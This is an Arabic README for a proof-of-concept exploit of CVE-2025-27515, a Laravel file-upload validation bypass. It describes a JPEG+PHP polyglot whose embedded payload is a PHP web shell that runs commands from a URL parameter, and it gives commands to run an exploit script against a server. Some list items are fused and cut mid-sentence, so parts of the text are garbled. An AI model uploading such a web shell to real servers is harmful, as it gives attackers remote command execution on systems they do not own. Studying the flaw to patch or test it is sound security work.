
إثبات المفهوم لـ CVE-2025-27515
عرض عملي لـ CVE-2025-27515، وهي ثغرة تجاوز التحقق من رفع الملفات في إطار Laravel (≤ 12.0.0).
CVE-2025-27515 هي تجاوز تحقق يسمح للمهاجمين بالالتفاف على قيود رفع الملفات عندما تستخدم تطبيقات Laravel أنماط تحقق بطاقة جامدة (files.*). تمكن الثغرة من رفع ملفات ضارة عن طريق استغلال نقاط الضعف في كيفية معالجة Laravel لرفع الملفات القائمة على المصفوفات.
الخطورة: متوسط/مرتفع
CWE: CWE-20 (التحقق غير السليم من المدخلات)
يستخدم الاستغلال ملف JPEG+PHP متعدد الصيغ (polyglot) الذي:
FF D8 FF E0) لتجاوز التحقق من نوع MIME<?php system($_GET['cmd']); ?>).jpg لاجتياز فحوصات امتداد الملفphp artisan serve
# Access at http://localhost:8000/upload
إصدار بايثون:
pip3 install -r requirements.txt
python3 exploit.py http://localhost:8000
للاستخدام التعليمي واختبار الأمان المصرح به فقط
بواسطة Guaxinim | أبحاث الأمن السيبراني